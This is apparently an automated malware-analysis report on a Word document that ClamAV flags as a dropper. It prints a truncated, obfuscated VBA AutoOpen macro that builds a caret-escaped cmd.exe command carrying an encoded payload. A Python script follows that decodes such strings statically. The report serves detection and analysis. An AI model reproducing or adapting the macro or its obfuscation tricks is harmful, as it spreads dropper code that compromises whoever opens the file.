MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The file contains a VBA macro with an AutoOpen function, a common technique for malicious documents. The macro assembles a command string from short concatenated literals, Chr() calls with arithmetic arguments (Chr(4 + 1 + 3 + 5 + 21) is Chr(34), a double quote) and cmd.exe caret escapes, with meaningless Hour calls interleaved as padding under On Error Resume Next, and hands the result to Shell() (the call is flagged by the OLE_VBA_SHELL heuristic and lies past the truncated preview). With the carets removed, the string begins 'md /V/C"set 5KoY=AAC...'; the leading character is not in the preview, but the shape is a cmd.exe invocation with /V (delayed environment-variable expansion) that stores a long encoded blob in the variable 5KoY, and the remaining string variables extend that blob. The decode-and-execute tail of the command is not in the recovered portion, so the reading that this utility downloads and executes a second-stage payload rests on this construction and on the ClamAV detection name 'Doc.Dropper.Sagent-6667985-0', which classifies the file as a dropper; no download URL is present in the recovered macro.
Heuristics (6)
- ClamAV: Doc.Dropper.Sagent-6667985-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Sagent-6667985-0
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this description does not fit this sample: a VBA project was recovered (macros.bas below, with its own AutoOpen handling flagged by OLE_VBA_AUTOOPEN), so treat this marker as redundant rather than as an independent finding.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI present in any Office document with drawing parts; it is not a network indicator and is unrelated to the second stage.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9475 bytes | d6897d4e5f735c83b834dc7860b86c4ad6ac4b002aabc5e9f97efea74cc86b0a |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ZrnDJfirlOumq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bHhJoJVkjaA"
Function MRvkQL()
On _
Error _
Resume _
Next
Hour 18813 * rDzaa / sRdkb * 56990
Hour 52298 / brvId
Hour 98170 / 5979
Hour 93826 / lLlIb
Hour 58048 * PSTzAY
rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC"
Hour zufTJ / sPiiNJ * HHGrtK / XmIbC
Hour rSVVX * ipdRV
LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q"
Hour lYKDqL * DRvqlz
Hour SjOWd * IoHLnw
Hour 13847 / zZJaC
Hour Ejhmi / Liolid
MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB"
Hour ZTfBNZ * FLWcu / wLIsq / jQPVA
Hour 85837 * XkDcFJ / 79039 * atVSIh
Hour 83767 / KkjLBw / 45172 * JnOPT
Hour 77815 / HcFDcV
OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S"
Hour GZnwdG / 36176
Hour 53 / rizjzQ / juVdiN * SaiSJ
zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G"
Hour 8551 / GRfzK
Hour 24529 / CUlFJk * 39266 / QjUbX
Hour GLIALI * TzmTA / 36107 * ZPflB
uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA"
Hour 13143 / SwpVnj
Hour 69242 / 3376
Hour GjXNb * wnhaIo
TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h"
Hour NGiihh / zOPJzS
Hour 59246 * HNVrIj
JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^"
MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm
Hour pZZPv / 40997
End Function
Function umRtWz()
On _
Error _
Resume _
Next
Hour QvNzCj * jhsEO / 61338 * Cbswj
Hour FPzcY * NnrHnw * 40361 * qLWoTo
Hour 83245 / HIPBTa * 37186 * hHXXw
Hour PfTFR * jIVFsG / 75331 / wwmnv
TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^"
Hour 35269 / uUXuj
Hour PrvAji * BWPhvJ
Hour 330 * jPYKz * ITSUmh * 74136
TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^"
Hour qYpWT / SFCJu / 82951 / 58160
Hour 84463 / HkpKai
Hour MwwJiW * NUBRKJ
Hour 81561 / wTiAG * YZVJu / LFjDRI
PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^"
Hour 18793 / FTzki / LUUCG * HKRnG
Hour ViqRT / DDBFwL * 42049 / amYIz
Hour 80361 * TXMPCG
JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s"
Hour 4094 / tbLJOW
Hour 70526 / jXtfH * 58387 / GZCmk
Hour 28709 / nijjM / 25640 / bwQcoo
VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s"
Hour 81619 * iCutL * 73703 * WcGjk
iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9"
Hour nwafq / wpmLh * 29355 / PvlkU
zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A"
Hour 37630 * qwuzXD
ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC"
Hour 70925 * dtorif / aQJEYU * CGpIRX
Hour 32444 * 42522 * vQATnI / CaJbpZ
Hour Bilzlh * AFiNH * iXMGjV / PBKzqH
FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4"
Hour 8087 * WJwOf * 33573 / HfBzLX
Hour lmqXRb / DIrAzN
tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4"
Hour 85626 * FqzBMk / 11484 / vQHQz
Hour FSlAa / OTVzLw / ipNFO * QSpTU
Hour 66347 / PdjfuK / 51671 / ubDmXu
DUnhRKD = "B^Q^b" + "A" + "4CA^tB" + "w^b^A^" + "MG^A^" + "u^AA^Z^" + "AUGA^y"
umRtWz = TiENB + TYuYZakJlKs + PipfGatdikZ + JvHq
```
... (truncated)
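The summary above quotes a reconstructed command string; the following added example (written for this page, not code from the analyzer or from the sample) shows how that string is recovered statically from a dump like macros.bas. It folds VBA `_` line continuations, ignores the `Hour ...` padding statements, evaluates every assignment whose right-hand side is string literals, `Chr(<arithmetic>)` calls and earlier variables joined by `+` or `&`, records what each Function returns, and then applies the cmd.exe caret rule (`^x` becomes `x`). Two assumptions: the macro hides its payload only in those constructs (true for the visible part of this sample), and the caret rule may be applied to the whole string, which holds here because the `/C` argument opens with a double quote that cmd.exe strips before parsing the rest. The embedded input is a constructed excerpt: the first two string variables of `MRvkQL()` with the return line shortened to those two.

```python
"""Recover the cmd.exe string that a VBA concatenation macro (like macros.bas above) builds.

Added example, not the analyzer's code. Assumes the macro only hides its
payload in string literals, Chr(<arithmetic>) calls and earlier variables.
"""
import ast
import operator
import re

# Constructed input: the start of MRvkQL() from the macros.bas dump on this page,
# cut to its first two string variables (the real return line sums eight).
SAMPLE_VBA = r'''Attribute VB_Name = "bHhJoJVkjaA"
Function MRvkQL()
On _
Error _
Resume _
Next
Hour 18813 * rDzaa / sRdkb * 56990
rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC"
Hour zufTJ / sPiiNJ * HHGrtK / XmIbC
LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q"
MRvkQL = rnwIiB + LKbZwRbqKVT
Hour pZZPv / 40997
End Function
'''

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Div: operator.truediv}

def _arith(node):
    """Evaluate the integer arithmetic hidden inside Chr(); refuse anything else."""
    if isinstance(node, ast.Expression):
        return _arith(node.body)
    if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_arith(node.left), _arith(node.right))
    raise ValueError("unsupported Chr() argument")

_TOKEN = re.compile(r'\s*(?:"((?:[^"]|"")*)"|Chr\(([^()]*)\)|([A-Za-z_]\w*)|([+&]))', re.I)
_ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
_FUNC = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+([A-Za-z_]\w*)", re.I)

def eval_string_expr(expr, env):
    """Concatenate literals, Chr() results and known variables joined by + or &."""
    out, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if not m:
            raise ValueError("not a plain string expression: %r" % expr[pos:pos + 20])
        lit, chr_arg, name, _op = m.groups()
        if lit is not None:
            out.append(lit.replace('""', '"'))          # VBA doubles quotes to escape them
        elif chr_arg is not None:
            out.append(chr(round(_arith(ast.parse(chr_arg.strip(), mode="eval")))))
        elif name is not None:
            out.append(env[name])                          # KeyError if never assigned
        pos = m.end()
    return "".join(out)

def join_continuations(src):
    """Fold VBA ` _` line continuations (`On _` / `Error _` ...) into one statement."""
    lines, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line.endswith(" _"):
            buf += line[:-1]
            continue
        lines.append(buf + line)
        buf = ""
    return lines + ([buf] if buf else [])

def recover_strings(src):
    """Return (all string variables, {function: return value}) from a VBA module."""
    env, returns, current = {}, {}, None
    for line in join_continuations(src):
        if line.lstrip().lower().startswith("attribute "):
            continue                                       # module metadata
        fm = _FUNC.match(line)
        if fm:
            current = fm.group(1)
            continue
        am = _ASSIGN.match(line)
        if not am:
            continue                                       # `Hour ...` padding, End Function, ...
        name, rhs = am.groups()
        try:
            env[name] = eval_string_expr(rhs, env)
        except (ValueError, KeyError):
            continue                                       # not a string expression we model
        if current and name.lower() == current.lower():
            returns[current] = env[name]                   # `Name = ...` inside Function Name
    return env, returns

def strip_cmd_carets(s):
    """cmd.exe's parse-time escape rule: `^x` becomes `x`, so `^^` becomes `^`."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            i += 1                                         # drop the caret, keep the escaped char
        out.append(s[i])
        i += 1
    return "".join(out)

def recover_commands(src=SAMPLE_VBA):
    """Map each Function to the de-escaped string it returns to Shell()."""
    return {name: strip_cmd_carets(val) for name, val in recover_strings(src)[1].items()}

if __name__ == "__main__":
    for name, cmd in recover_commands().items():
        print(name, "->", cmd)
```

Feed the full macros.bas to recover_commands() to get all eight pieces of MRvkQL and the umRtWz tail. Constructs the evaluator does not model (object calls, API declarations, anything that is not a plain string expression) are skipped rather than executed, which is why this is done with a small parser instead of a VBA emulator; the recovered string is inert text that still has to be read, not run.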